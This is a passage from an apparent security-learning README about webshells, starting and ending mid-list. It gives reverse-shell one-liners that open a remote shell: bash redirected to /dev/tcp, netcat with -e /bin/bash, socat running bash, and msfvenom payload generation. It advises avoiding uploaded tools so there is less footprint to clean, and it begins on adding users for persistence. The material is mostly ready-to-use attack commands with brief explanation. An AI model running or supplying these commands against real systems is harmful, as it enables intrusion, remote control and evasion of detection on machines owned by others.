shinmao/SecurityLearning/Webshell/README.md

 bash -i >& /dev/tcp/target_ip/8080 0>&1
 ```
 `>&` means previous one combines with the following one then redirect to it.
 Therefore, `0>&1` means `std_input` combines with `std_output` and redirect to `std_output`.

 2. netcat
 ```php
 nc -lvvp 8080   // listen to the 8080 port
 nc target_ip 8080 -t -e /bin/bash
 ```
 build up a connection then execute `/bin/bash`

 3. socat
 ```php
 socat tcp-listen:8080 -
 ./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:target_ip:8080
 ```

 4. python, php, java, perl
 http://www.03sec.com/3140.shtml

 5. msfvenom can generate the payload
 ```php
 msfvenom -l payloads cmd/unix/reverse
 // this can list all the reverse script msfvenom -p cmd/unix/xxxx lhost=target_ip lport=target_port R
 ```

+Try your best not to upload any tools to the server because it would be complicated to clean your footprint after all.
+Therefore, we choose the **natural** library to build up the shell much more...

 If you don't like reverse shell anymore, you can...
 1. add user